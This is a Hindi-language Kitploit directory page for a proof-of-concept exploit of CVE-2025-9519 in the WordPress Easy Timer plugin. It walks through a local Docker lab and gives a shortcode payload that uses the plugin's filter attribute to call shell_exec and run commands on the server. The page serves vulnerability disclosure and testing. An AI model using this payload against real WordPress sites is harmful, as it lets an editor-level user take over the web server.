Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Poc-CVE-2025-9519 — CVE-2025-9519 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो WordPress Easy Timer प्लगइन में क्राफ्टेड शॉर्टकोड फ़िल्टर के माध्यम से रिमोट कोड एक्ज़ीक्यूशन प्रदर्शित करता है, जिसमें Docker-आधारित सेटअप शामिल है। | Kitploit
उपकरण/GitHubGitHub/nimisha17/poc-cve-2025-9519
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubnimisha17/poc-cve-2025-9519

Poc-CVE-2025-9519

CVE-2025-9519 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो WordPress Easy Timer प्लगइन में क्राफ्टेड शॉर्टकोड फ़िल्टर के माध्यम से रिमोट कोड एक्ज़ीक्यूशन प्रदर्शित करता है, जिसमें Docker-आधारित सेटअप शामिल है।

रिपॉजिटरी देखें
2110 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Easy Timer v4.2.1 -

पूर्वापेक्षाएँ

  • Docker Engine स्थापित
  • Docker Compose स्थापित

आधिकारिक Docker दस्तावेज़ देखें: Docker Engine Install

1. Docker के साथ WordPress प्रारंभ करें

अपनी प्रोजेक्ट निर्देशिका से:

root@kitploit:~
sudo docker-compose up -d
mkdir -p wp-content/plugins
cd wp-content/plugins

wget https://downloads.wordpress.org/plugin/easy-timer.4.2.1.zip
unzip easy-timer.4.2.1.zip

sudo docker compose restart wordpress

2. WordPress सेट अप करें

  1. http://localhost:8000/ पर जाएँ
  2. WordPress सेटअप पूर्ण करें
  3. WordPress डैशबोर्ड → प्लगइन्स → पर जाएँ और पर क्लिक करें।
Easy Timer
सक्रिय करें
Screenshot from 2025-10-27 12-52-06

3. संपादक विशेषाधिकारों के साथ नया उपयोगकर्ता जोड़ें

अपनी प्रोजेक्ट निर्देशिका से निम्नलिखित कमांड निष्पादित करें:

root@kitploit:~
docker compose run --rm wpcli user create \
  editoruser [email protected] \
  --role=editor \
  --user_pass=P@ssw0rd!

(नोट: अपनी पसंद के उपयोगकर्ता नाम, ईमेल और पासवर्ड से बदलें!)

4. पोस्ट बनाएँ

  1. पोस्ट → नया जोड़ें पर जाएँ
  2. एक शॉर्टकोड ब्लॉक डालें और निम्नलिखित दर्ज करें:
root@kitploit:~
[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]
  1. टाइमर को निष्पादित होते देखने के लिए अपडेट → पोस्ट पूर्वावलोकन पर क्लिक करें।

⚠️ नोट: शॉर्टकोड को ठीक से प्रस्तुत करने के लिए सुनिश्चित करें कि आप शॉर्टकोड ब्लॉक का उपयोग कर रहे हैं, न कि पैराग्राफ ब्लॉक का।

Screenshot from 2025-10-27 13-36-40

बधाई हो, आपको RCE मिल गया। image

डिबगिंग युक्तियाँ

  • चल रहे कंटेनरों की जाँच करें:
root@kitploit:~
sudo docker ps

आपको कुछ इस तरह दिखना चाहिए:

Screenshot from 2025-10-27 12-51-08
  • यदि शॉर्टकोड प्रस्तुत नहीं हो रहे हैं:

    1. रूप → थीम पर जाएँ
    2. Twenty Twenty-Three (या कोई अन्य डिफ़ॉल्ट थीम) सक्रिय करें।
  • यदि http://localhost:8000/ पर नेविगेट करने पर डेटाबेस कनेक्ट नहीं है दिखाई देता है:

    1. डेटाबेस सेटअप पूर्ण होने के लिए एक या दो मिनट प्रतीक्षा करें
टूल डाउनलोड करें